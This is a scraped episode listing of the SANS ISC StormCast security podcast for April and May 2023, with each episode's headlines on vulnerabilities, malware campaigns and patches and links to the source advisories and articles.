Signals Defense With Faraday Bags https://isc.sans.edu/forums/diary/Signals%20Defense%20With%20Faraday%20Bags%20%26%20Flipper%20Zero/29840/ Microsoft Sharepoint Scans Password Protected Files https://infosec.exchange/@threatresearch/110373860063222707# Critical Sandbox Escape Vulnerability in VM2 https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5 Geacon Brings Cobalt Strike Capabilities to MacOS Threat Actors https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/
5/17/20235 minutes, 36 seconds
Episode Artwork

ISC StormCast for Wednesday, May 17th, 2023

Signals Defense With Faraday Bags https://isc.sans.edu/forums/diary/Signals%20Defense%20With%20Faraday%20Bags%20%26%20Flipper%20Zero/29840/ Microsoft Sharepoint Scans Password Protected Files https://infosec.exchange/@threatresearch/110373860063222707# Critical Sandbox Escape Vulnerability in VM2 https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5 Geacon Brings Cobalt Strike Capabilities to MacOS Threat Actors https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/
5/17/20235 minutes, 36 seconds
Episode Artwork

ISC StormCast for Tuesday, May 16th, 2023

Ongoing Facebook Phishing campaign Without a Sender and (almost) without Links https://isc.sans.edu/diary/Ongoing%20Facebook%20phishing%20campaign%20without%20a%20sender%20and%20%28almost%29%20without%20links/29848 Intel Microcode Updates Do Not Patch Vulnerability https://www.theregister.com/2023/05/15/intel_mystery_microcode/ Fake Trezor Hardware Crypto Wallet https://www.kaspersky.com/blog/fake-trezor-hardware-crypto-wallet/48155/ TP-Link Archer AX-21 Command Injection CVE-2023-1389 Exploited https://www.fortiguard.com/threat-signal-report/5157/tp-link-archer-ax-21-command-injection-vulnerability-cve-2023-1389-exploited-in-the-wild
5/16/20235 minutes, 19 seconds
Episode Artwork

ISC StormCast for Tuesday, May 16th, 2023

Ongoing Facebook Phishing campaign Without a Sender and (almost) without Links https://isc.sans.edu/diary/Ongoing%20Facebook%20phishing%20campaign%20without%20a%20sender%20and%20%28almost%29%20without%20links/29848 Intel Microcode Updates Do Not Patch Vulnerability https://www.theregister.com/2023/05/15/intel_mystery_microcode/ Fake Trezor Hardware Crypto Wallet https://www.kaspersky.com/blog/fake-trezor-hardware-crypto-wallet/48155/ TP-Link Archer AX-21 Command Injection CVE-2023-1389 Exploited https://www.fortiguard.com/threat-signal-report/5157/tp-link-archer-ax-21-command-injection-vulnerability-cve-2023-1389-exploited-in-the-wild
5/16/20235 minutes, 19 seconds
Episode Artwork

ISC StormCast for Monday, May 15th, 2023

The .zip gTLD: Risks and Opportunities https://isc.sans.edu/forums/diary/The+zip+gTLD+Risks+and+Opportunities/29838/ Brave Forgetful Browsing https://brave.com/privacy-updates/25-forgetful-browsing/ Intel Mystery Microcode Patch https://www.phoronix.com/news/Intel-12-May-2023-Microcode Netgear Updates https://kb.netgear.com/000065619/Security-Advisory-for-Multiple-Vulnerabilities-on-the-RAX30-PSV-2022-0348 Synology Updates https://www.synology.com/en-global/security/advisory/Synology_SA_23_04 https://claroty.com/team82/research/chaining-five-vulnerabilities-to-exploit-netgear-nighthawk-rax30-routers-at-pwn2own-toronto-2022
5/15/20237 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, May 15th, 2023

The .zip gTLD: Risks and Opportunities https://isc.sans.edu/forums/diary/The+zip+gTLD+Risks+and+Opportunities/29838/ Brave Forgetful Browsing https://brave.com/privacy-updates/25-forgetful-browsing/ Intel Mystery Microcode Patch https://www.phoronix.com/news/Intel-12-May-2023-Microcode Netgear Updates https://kb.netgear.com/000065619/Security-Advisory-for-Multiple-Vulnerabilities-on-the-RAX30-PSV-2022-0348 Synology Updates https://www.synology.com/en-global/security/advisory/Synology_SA_23_04 https://claroty.com/team82/research/chaining-five-vulnerabilities-to-exploit-netgear-nighthawk-rax30-routers-at-pwn2own-toronto-2022
5/15/20237 minutes, 6 seconds
Episode Artwork

ISC StormCast for Friday, May 12th, 2023

Geolocating IPs is Harder Than You Think https://isc.sans.edu/diary/Geolocating%20IPs%20is%20harder%20than%20you%20think/29834 Pre-Infected Mobile Phones https://www.theregister.com/2023/05/11/bh_asia_mobile_phones/ Dragos Breach https://www.dragos.com/blog/deconstructing-a-cybersecurity-event/ AndoryuBot Targets Ruckus Admin RCE Vulnerability https://www.fortinet.com/blog/threat-research/andoryubot-new-botnet-campaign-targets-ruckus-wireless-admin-remote-code-execution-vulnerability-cve-2023-25717
5/12/20236 minutes, 20 seconds
Episode Artwork

ISC StormCast for Friday, May 12th, 2023

Geolocating IPs is Harder Than You Think https://isc.sans.edu/diary/Geolocating%20IPs%20is%20harder%20than%20you%20think/29834 Pre-Infected Mobile Phones https://www.theregister.com/2023/05/11/bh_asia_mobile_phones/ Dragos Breach https://www.dragos.com/blog/deconstructing-a-cybersecurity-event/ AndoryuBot Targets Ruckus Admin RCE Vulnerability https://www.fortinet.com/blog/threat-research/andoryubot-new-botnet-campaign-targets-ruckus-wireless-admin-remote-code-execution-vulnerability-cve-2023-25717
5/12/20236 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, May 11th, 2023

Exploratory Data Analysis with CISSM Cyber Attacks Database Part 2 https://isc.sans.edu/diary/Exploratory%20Data%20Analysis%20with%20CISSM%20Cyber%20Attacks%20Database%20-%20Part%202/29828 Microsoft Patched Outlook (actually Windows) vulnerability again https://www.akamai.com/blog/security-research/important-outlook-vulnerability-bypass-windows-api Law Enforcement and Intelligence Agencies Disable "Snake" Malware https://media.defense.gov/2023/May/09/2003218554/-1/-1/1/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF Fake System Update Drop Malware https://www.malwarebytes.com/blog/threat-intelligence/2023/05/fake-system-update-drops-new-highly-evasive-loader
5/11/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, May 11th, 2023

Exploratory Data Analysis with CISSM Cyber Attacks Database Part 2 https://isc.sans.edu/diary/Exploratory%20Data%20Analysis%20with%20CISSM%20Cyber%20Attacks%20Database%20-%20Part%202/29828 Microsoft Patched Outlook (actually Windows) vulnerability again https://www.akamai.com/blog/security-research/important-outlook-vulnerability-bypass-windows-api Law Enforcement and Intelligence Agencies Disable "Snake" Malware https://media.defense.gov/2023/May/09/2003218554/-1/-1/1/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF Fake System Update Drop Malware https://www.malwarebytes.com/blog/threat-intelligence/2023/05/fake-system-update-drops-new-highly-evasive-loader
5/11/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Wednesday, May 10th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20May%202023%20Patch%20Tuesday/29826 GitHub "Push Protection" now out of Beta https://github.blog/2023-05-09-push-protection-is-generally-available-and-free-for-all-public-repositories/
5/10/20235 minutes, 57 seconds
Episode Artwork

ISC StormCast for Wednesday, May 10th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20May%202023%20Patch%20Tuesday/29826 GitHub "Push Protection" now out of Beta https://github.blog/2023-05-09-push-protection-is-generally-available-and-free-for-all-public-repositories/
5/10/20235 minutes, 57 seconds
Episode Artwork

ISC StormCast for Tuesday, May 9th, 2023

QR Codes Used in Fake Parking Tickets and Surveys https://www.bleepingcomputer.com/news/security/qr-codes-used-in-fake-parking-tickets-surveys-to-steal-your-money/ Microsoft Edge Update https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnote-stable-channel Facebook Sees More Fake ChatGPT https://about.fb.com/news/2023/05/metas-q1-2023-security-reports/ CyberGhost VPN Vulnerability https://www.pentestpartners.com/security-blog/bullied-by-bugcrowd-over-kape-cyberghost-disclosure/
5/9/20236 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, May 9th, 2023

QR Codes Used in Fake Parking Tickets and Surveys https://www.bleepingcomputer.com/news/security/qr-codes-used-in-fake-parking-tickets-surveys-to-steal-your-money/ Microsoft Edge Update https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnote-stable-channel Facebook Sees More Fake ChatGPT https://about.fb.com/news/2023/05/metas-q1-2023-security-reports/ CyberGhost VPN Vulnerability https://www.pentestpartners.com/security-blog/bullied-by-bugcrowd-over-kape-cyberghost-disclosure/
5/9/20236 minutes, 21 seconds
Episode Artwork

ISC StormCast for Monday, May 8th, 2023

Quickly Finding Encoded Payloads in Office Documents https://isc.sans.edu/forums/diary/Quickly+Finding+Encoded+Payloads+in+Office+Documents/29818/ Exploratory Data Analysis with CISSM Cyber Attacks Database Part 1 https://isc.sans.edu/forums/diary/Exploratory+Data+Analysis+with+CISSM+Cyber+Attacks+Database+Part+1/29816/ Guildma is now Abusing Colorcpl.exe LOLBIN https://isc.sans.edu/forums/diary/Guildma+is+now+abusing+colorcplexe+LOLBIN/29814/ Leaked MSI Keys https://github.com/binarly-io/SupplyChainAttacks/blob/main/MSI/ImpactedDevices.md https://twitter.com/matrosov/status/1654560343295934464 PHP Packages Compromised https://blog.packagist.com/packagist-org-maintainer-account-takeover/
5/8/20236 minutes, 2 seconds
Episode Artwork

ISC StormCast for Monday, May 8th, 2023

Quickly Finding Encoded Payloads in Office Documents https://isc.sans.edu/forums/diary/Quickly+Finding+Encoded+Payloads+in+Office+Documents/29818/ Exploratory Data Analysis with CISSM Cyber Attacks Database Part 1 https://isc.sans.edu/forums/diary/Exploratory+Data+Analysis+with+CISSM+Cyber+Attacks+Database+Part+1/29816/ Guildma is now Abusing Colorcpl.exe LOLBIN https://isc.sans.edu/forums/diary/Guildma+is+now+abusing+colorcplexe+LOLBIN/29814/ Leaked MSI Keys https://github.com/binarly-io/SupplyChainAttacks/blob/main/MSI/ImpactedDevices.md https://twitter.com/matrosov/status/1654560343295934464 PHP Packages Compromised https://blog.packagist.com/packagist-org-maintainer-account-takeover/
5/8/20236 minutes, 2 seconds
Episode Artwork

ISC StormCast for Friday, May 5th, 2023

Infostealer Embedded in a Word Document https://isc.sans.edu/diary/Infostealer%20Embedded%20in%20a%20Word%20Document/29810 Cisco SPA-112 Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-spa-unauth-upgrade-UqhyTWW Fortinet May Updates https://www.fortiguard.com/psirt?date=05-2023 PaperCut exploitation - A Different Path to Code Execution https://vulncheck.com/blog/papercut-rce
5/5/20236 minutes
Episode Artwork

ISC StormCast for Friday, May 5th, 2023

Infostealer Embedded in a Word Document https://isc.sans.edu/diary/Infostealer%20Embedded%20in%20a%20Word%20Document/29810 Cisco SPA-112 Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-spa-unauth-upgrade-UqhyTWW Fortinet May Updates https://www.fortiguard.com/psirt?date=05-2023 PaperCut exploitation - A Different Path to Code Execution https://vulncheck.com/blog/papercut-rce
5/5/20236 minutes
Episode Artwork

ISC StormCast for Thursday, May 4th, 2023

Increased Number of Configuration File Scans https://isc.sans.edu/diary/Increased%20Number%20of%20Configuration%20File%20Scans/29806 Google Enabling Passkeys https://blog.google/technology/safety-security/the-beginning-of-the-end-of-the-password/ Chrome to Drop Lock Icon from HTTPS https://blog.chromium.org/2023/05/an-update-on-lock-icon.html Attack Against AMD TPM Implementation https://arxiv.org/abs/2304.14717
5/4/20237 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, May 4th, 2023

Increased Number of Configuration File Scans https://isc.sans.edu/diary/Increased%20Number%20of%20Configuration%20File%20Scans/29806 Google Enabling Passkeys https://blog.google/technology/safety-security/the-beginning-of-the-end-of-the-password/ Chrome to Drop Lock Icon from HTTPS https://blog.chromium.org/2023/05/an-update-on-lock-icon.html Attack Against AMD TPM Implementation https://arxiv.org/abs/2304.14717
5/4/20237 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, May 3rd, 2023

VBA Project References https://isc.sans.edu/diary/VBA%20Project%20References/29800 BGP Message Parsing Vulnerabilities in FRRouting https://www.forescout.com/blog/three-new-bgp-message-parsing-vulnerabilities-disclosed-in-frrouting-software/ JWT ECDSA Algorithm Confusion https://blog.pentesterlab.com/exploring-algorithm-confusion-attacks-on-jwt-exploiting-ecdsa-23f7ff83390f
5/3/20235 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, May 3rd, 2023

VBA Project References https://isc.sans.edu/diary/VBA%20Project%20References/29800 BGP Message Parsing Vulnerabilities in FRRouting https://www.forescout.com/blog/three-new-bgp-message-parsing-vulnerabilities-disclosed-in-frrouting-software/ JWT ECDSA Algorithm Confusion https://blog.pentesterlab.com/exploring-algorithm-confusion-attacks-on-jwt-exploiting-ecdsa-23f7ff83390f
5/3/20235 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, May 2nd, 2023

Passive Analysis of a Phishing Attachment https://isc.sans.edu/diary/%22Passive%22%20analysis%20of%20a%20phishing%20attachment/29798 Apple Rapid Security Response https://www.macrumors.com/2023/05/01/rapid-security-response-16-4-1/ Grafana Security Release https://grafana.com/blog/2023/04/26/grafana-security-release-new-versions-of-grafana-with-security-fixes-for-cve-2023-28119-and-cve-2023-1387/ Illumina Vulnerability https://www.fda.gov/medical-devices/letters-health-care-providers/illumina-cybersecurity-vulnerability-affecting-universal-copy-service-software-may-present-risks
5/2/20235 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, May 2nd, 2023

Passive Analysis of a Phishing Attachment https://isc.sans.edu/diary/%22Passive%22%20analysis%20of%20a%20phishing%20attachment/29798 Apple Rapid Security Response https://www.macrumors.com/2023/05/01/rapid-security-response-16-4-1/ Grafana Security Release https://grafana.com/blog/2023/04/26/grafana-security-release-new-versions-of-grafana-with-security-fixes-for-cve-2023-28119-and-cve-2023-1387/ Illumina Vulnerability https://www.fda.gov/medical-devices/letters-health-care-providers/illumina-cybersecurity-vulnerability-affecting-universal-copy-service-software-may-present-risks
5/2/20235 minutes, 40 seconds
Episode Artwork

ISC StormCast for Monday, May 1st, 2023

Quick IOC Scan With Docker https://isc.sans.edu/diary/Quick%20IOC%20Scan%20With%20Docker/29788 Dobfuscation Scripts When Encodings Help https://isc.sans.edu/diary/Deobfuscating%20Scripts%3A%20When%20Encodings%20Help/29792 Hackers Are Breaking Into AT&T Email Accounts To Steal Cryptocurrency https://techcrunch.com/2023/04/26/hackers-are-breaking-into-att-email-accounts-to-steal-cryptocurrency/ Trheat Actor Selling New Atomic MacOS AMOS Stealer on Telegram https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/ Zyxel Firewall Vulnerability https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-command-injection-vulnerability-of-firewalls
5/1/20235 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, May 1st, 2023

Quick IOC Scan With Docker https://isc.sans.edu/diary/Quick%20IOC%20Scan%20With%20Docker/29788 Dobfuscation Scripts When Encodings Help https://isc.sans.edu/diary/Deobfuscating%20Scripts%3A%20When%20Encodings%20Help/29792 Hackers Are Breaking Into AT&T Email Accounts To Steal Cryptocurrency https://techcrunch.com/2023/04/26/hackers-are-breaking-into-att-email-accounts-to-steal-cryptocurrency/ Trheat Actor Selling New Atomic MacOS AMOS Stealer on Telegram https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/ Zyxel Firewall Vulnerability https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-command-injection-vulnerability-of-firewalls
5/1/20235 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, April 28th, 2023

Ransomware Gang Exploiting Unpatches Veeam Backup Products https://www.computerweekly.com/news/365535586/Ransomware-gang-exploiting-unpatched-Veeam-backup-products Google Authenticator Sync Encryption https://security.googleblog.com/2023/04/google-authenticator-now-supports.html Keycloak Vulnerability https://out.reddit.com/t3_130km04?url=https%3A%2F%2Fwww.offensity.com%2Fen%2Fblog%2Fuser-impersonation-via-stolen-uuid-code-in-keycloak-cve-2023-0264%2F&token=AQAAjSdLZJTzQM37107hVzYY-tbz6ak81pMNqN9qv3m2SWXEOMIm&app_name=web2x&user_id=33629461&web_redirect=true
4/28/20236 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, April 28th, 2023

Ransomware Gang Exploiting Unpatches Veeam Backup Products https://www.computerweekly.com/news/365535586/Ransomware-gang-exploiting-unpatched-Veeam-backup-products Google Authenticator Sync Encryption https://security.googleblog.com/2023/04/google-authenticator-now-supports.html Keycloak Vulnerability https://out.reddit.com/t3_130km04?url=https%3A%2F%2Fwww.offensity.com%2Fen%2Fblog%2Fuser-impersonation-via-stolen-uuid-code-in-keycloak-cve-2023-0264%2F&token=AQAAjSdLZJTzQM37107hVzYY-tbz6ak81pMNqN9qv3m2SWXEOMIm&app_name=web2x&user_id=33629461&web_redirect=true
4/28/20236 minutes, 15 seconds
Episode Artwork

ISC StormCast for Thursday, April 27th, 2023

Strolling Through Cyberspace and Hunting for Phishing Sites https://isc.sans.edu/diary/Strolling%20through%20Cyberspace%20and%20Hunting%20for%20Phishing%20Sites/29780 RSA Panel: Five most dangerous new attack techniques https://www.rsaconference.com/usa/agenda/session/The%20Five%20Most%20Dangerous%20New%20Attack%20Techniques SANS.edu Research Journal https://www.sans.edu/cyber-security-research
4/27/20235 minutes, 45 seconds
Episode Artwork

ISC StormCast for Thursday, April 27th, 2023

Strolling Through Cyberspace and Hunting for Phishing Sites https://isc.sans.edu/diary/Strolling%20through%20Cyberspace%20and%20Hunting%20for%20Phishing%20Sites/29780 RSA Panel: Five most dangerous new attack techniques https://www.rsaconference.com/usa/agenda/session/The%20Five%20Most%20Dangerous%20New%20Attack%20Techniques SANS.edu Research Journal https://www.sans.edu/cyber-security-research
4/27/20235 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, April 26th, 2023

Calculating CVSS Scores with ChatGPT https://isc.sans.edu/diary/Calculating%20CVSS%20Scores%20with%20ChatGPT/29774 Amplifying SLP Traffic https://www.bitsight.com/blog/new-high-severity-vulnerability-cve-2023-29552-discovered-service-location-protocol-slp Insecure Default Configuration in Apache Superset https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/ SLP Amplification; Apache Superset RCE; PoC Exploit for Sophos Web Appliciance https://github.com/W01fh4cker/CVE-2023-1671-POC
4/26/20236 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, April 26th, 2023

Calculating CVSS Scores with ChatGPT https://isc.sans.edu/diary/Calculating%20CVSS%20Scores%20with%20ChatGPT/29774 Amplifying SLP Traffic https://www.bitsight.com/blog/new-high-severity-vulnerability-cve-2023-29552-discovered-service-location-protocol-slp Insecure Default Configuration in Apache Superset https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/ SLP Amplification; Apache Superset RCE; PoC Exploit for Sophos Web Appliciance https://github.com/W01fh4cker/CVE-2023-1671-POC
4/26/20236 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, April 25th, 2023

Aukill EDR Killer Malware Abuses Process Explorer Driver https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/ Papercut Vulnerability Deep Dive https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise Solarwinds Patches https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/solarwinds_platform_2023-2_release_notes.htm Schneider Electric Update https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2023-101-04&p_enDocType=Security%20and%20Safety%20Notice&p_File_Name=SEVD-2023-101-04.pdf Virustotal Code Insight https://blog.virustotal.com/2023/04/introducing-virustotal-code-insight.html
4/25/20236 minutes, 5 seconds
Episode Artwork

ISC StormCast for Tuesday, April 25th, 2023

Aukill EDR Killer Malware Abuses Process Explorer Driver https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/ Papercut Vulnerability Deep Dive https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise Solarwinds Patches https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/solarwinds_platform_2023-2_release_notes.htm Schneider Electric Update https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2023-101-04&p_enDocType=Security%20and%20Safety%20Notice&p_File_Name=SEVD-2023-101-04.pdf Virustotal Code Insight https://blog.virustotal.com/2023/04/introducing-virustotal-code-insight.html
4/25/20236 minutes, 5 seconds
Episode Artwork

ISC StormCast for Monday, April 24th, 2023

Management of DMARC control for email impersonation fo domains in the .co TLD https://isc.sans.edu/forums/diary/Management+of+DMARC+control+for+email+impersonation+of+domains+in+the+co+TLD+part+1/29768/ X_Trader Supply Chain Attack Fallout https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain Car Hacking with Old Nokia Phones https://www.vice.com/en/article/v7beyj/car-thieves-tech-hidden-old-nokia-phones-bluetooth-speakers-emergency-engine-start-keyless Dog Hunt Finding Decoy Dog Toolkit https://blogs.infoblox.com/cyber-threat-intelligence/cyber-threat-advisory/dog-hunt-finding-decoy-dog-toolkit-via-anomalous-dns-traffic/
4/24/20235 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, April 24th, 2023

Management of DMARC control for email impersonation fo domains in the .co TLD https://isc.sans.edu/forums/diary/Management+of+DMARC+control+for+email+impersonation+of+domains+in+the+co+TLD+part+1/29768/ X_Trader Supply Chain Attack Fallout https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain Car Hacking with Old Nokia Phones https://www.vice.com/en/article/v7beyj/car-thieves-tech-hidden-old-nokia-phones-bluetooth-speakers-emergency-engine-start-keyless Dog Hunt Finding Decoy Dog Toolkit https://blogs.infoblox.com/cyber-threat-intelligence/cyber-threat-advisory/dog-hunt-finding-decoy-dog-toolkit-via-anomalous-dns-traffic/
4/24/20235 minutes, 45 seconds
Episode Artwork

ISC StormCast for Friday, April 21st, 2023

Taking a Bite Out of Password Expiry Helpdesk Calls https://isc.sans.edu/diary/Taking%20a%20Bite%20Out%20of%20Password%20Expiry%20Helpdesk%20Calls/29758 3CX Software Supply Chain Compromise https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise Google Ghost Tokens https://astrix.security/ghosttoken-exploiting-gcp-application-infrastructure-to-create-invisible-unremovable-trojan-app-on-google-accounts/ PyPi Trusted Publishers https://blog.pypi.org/posts/2023-04-20-introducing-trusted-publishers/
4/21/20236 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, April 21st, 2023

Taking a Bite Out of Password Expiry Helpdesk Calls https://isc.sans.edu/diary/Taking%20a%20Bite%20Out%20of%20Password%20Expiry%20Helpdesk%20Calls/29758 3CX Software Supply Chain Compromise https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise Google Ghost Tokens https://astrix.security/ghosttoken-exploiting-gcp-application-infrastructure-to-create-invisible-unremovable-trojan-app-on-google-accounts/ PyPi Trusted Publishers https://blog.pypi.org/posts/2023-04-20-introducing-trusted-publishers/
4/21/20236 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, April 20th, 2023

Yet Another Google Chrome 0-Day https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_18.html Oracle Critical Patch Update April 2023 https://www.oracle.com/security-alerts/cpuapr2023.html Github Provenance Action for npm Packages https://www.theregister.com/2023/04/19/github_actions_npm_origins/ Microsoft Revises Threat Actor Naming https://learn.microsoft.com/de-de/microsoft-365/security/intelligence/microsoft-threat-actor-naming
4/20/20234 minutes, 49 seconds
Episode Artwork

ISC StormCast for Thursday, April 20th, 2023

Yet Another Google Chrome 0-Day https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_18.html Oracle Critical Patch Update April 2023 https://www.oracle.com/security-alerts/cpuapr2023.html Github Provenance Action for npm Packages https://www.theregister.com/2023/04/19/github_actions_npm_origins/ Microsoft Revises Threat Actor Naming https://learn.microsoft.com/de-de/microsoft-365/security/intelligence/microsoft-threat-actor-naming
4/20/20234 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, April 19th, 2023

UDDIs Are Back: Attackers Rediscovering Old Exploits. https://isc.sans.edu/diary/UDDIs%20are%20back%3F%20Attackers%20rediscovering%20old%20exploits./29754UDDIExplorer; UDDIExplorer; Russian Attacks against Routers https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-108 Information Leakage on Discarded Routers https://www.welivesecurity.com/2023/04/18/discarded-not-destroyed-old-routers-reveal-corporate-secrets/
4/19/20235 minutes, 22 seconds
Episode Artwork

ISC StormCast for Wednesday, April 19th, 2023

UDDIs Are Back: Attackers Rediscovering Old Exploits. https://isc.sans.edu/diary/UDDIs%20are%20back%3F%20Attackers%20rediscovering%20old%20exploits./29754UDDIExplorer; UDDIExplorer; Russian Attacks against Routers https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-108 Information Leakage on Discarded Routers https://www.welivesecurity.com/2023/04/18/discarded-not-destroyed-old-routers-reveal-corporate-secrets/
4/19/20235 minutes, 22 seconds
Episode Artwork

ISC StormCast for Tuesday, April 18th, 2023

The strange case of the Great Honeypot of China https://isc.sans.edu/diary/The%20strange%20case%20of%20Great%20honeypot%20of%20China/29750 The LockBit ransomware (kinda) comes for macOS https://objective-see.org/blog/blog_0x75.html Google Cloud Used as C&C https://thehackernews.com/2023/04/google-uncovers-apt41s-use-of-open.html
4/18/20235 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, April 18th, 2023

The strange case of the Great Honeypot of China https://isc.sans.edu/diary/The%20strange%20case%20of%20Great%20honeypot%20of%20China/29750 The LockBit ransomware (kinda) comes for macOS https://objective-see.org/blog/blog_0x75.html Google Cloud Used as C&C https://thehackernews.com/2023/04/google-uncovers-apt41s-use-of-open.html
4/18/20235 minutes, 23 seconds
Episode Artwork

ISC StormCast for Monday, April 17th, 2023

Attack Campaing Tht Uses Fake Google Chrome Errors https://insight-jp.nttsecurity.com/post/102icvb/attack-campaign-that-uses-fake-google-chrome-error-to-distribute-malware-from-com Chromium Publishes Emergency Update https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html LAPS Update Errors https://learn.microsoft.com/en-us/windows-server/identity/laps/laps-overview Manage Engine Vulnerability https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/
4/17/20235 minutes, 25 seconds
Episode Artwork

ISC StormCast for Monday, April 17th, 2023

Attack Campaing Tht Uses Fake Google Chrome Errors https://insight-jp.nttsecurity.com/post/102icvb/attack-campaign-that-uses-fake-google-chrome-error-to-distribute-malware-from-com Chromium Publishes Emergency Update https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html LAPS Update Errors https://learn.microsoft.com/en-us/windows-server/identity/laps/laps-overview Manage Engine Vulnerability https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/
4/17/20235 minutes, 25 seconds
Episode Artwork

ISC StormCast for Friday, April 14th, 2023

HTTP: What's Left of it and the OCSP Problem https://isc.sans.edu/diary/HTTP%3A%20What%27s%20Left%20of%20it%20and%20the%20OCSP%20Problem/29744 NTP Vulnerability Update https://github.com/spwpun/ntp-4.2.8p15-cves/issues/1#issuecomment-1506667321 SecurePoint UTM Vulnerability CVE-2023-22897 https://www.rcesecurity.com/2023/04/securepwn-part-1-bypassing-securepoint-utms-authentication-cve-2023-22620/ https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/ Google Cloud Assured Open Source Software Services https://cloud.google.com/blog/products/identity-security/google-cloud-assured-open-source-software-service-now-ga
4/14/20236 minutes, 29 seconds
Episode Artwork

ISC StormCast for Friday, April 14th, 2023

HTTP: What's Left of it and the OCSP Problem https://isc.sans.edu/diary/HTTP%3A%20What%27s%20Left%20of%20it%20and%20the%20OCSP%20Problem/29744 NTP Vulnerability Update https://github.com/spwpun/ntp-4.2.8p15-cves/issues/1#issuecomment-1506667321 SecurePoint UTM Vulnerability CVE-2023-22897 https://www.rcesecurity.com/2023/04/securepwn-part-1-bypassing-securepoint-utms-authentication-cve-2023-22620/ https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/ Google Cloud Assured Open Source Software Services https://cloud.google.com/blog/products/identity-security/google-cloud-assured-open-source-software-service-now-ga
4/14/20236 minutes, 29 seconds
Episode Artwork

ISC StormCast for Thursday, April 13th, 2023

Recent IcedID (Bokbot) activity https://isc.sans.edu/forums/diary/Recent%20IcedID%20%28Bokbot%29%20activity/29740/ Microsoft Message Queue Vulnerabilities Details https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/ NTP Vulnerabilities https://github.com/spwpun/ntp-4.2.8p15-cves https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-0938
4/13/20236 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, April 13th, 2023

Recent IcedID (Bokbot) activity https://isc.sans.edu/forums/diary/Recent%20IcedID%20%28Bokbot%29%20activity/29740/ Microsoft Message Queue Vulnerabilities Details https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/ NTP Vulnerabilities https://github.com/spwpun/ntp-4.2.8p15-cves https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-0938
4/13/20236 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, April 12th, 2023

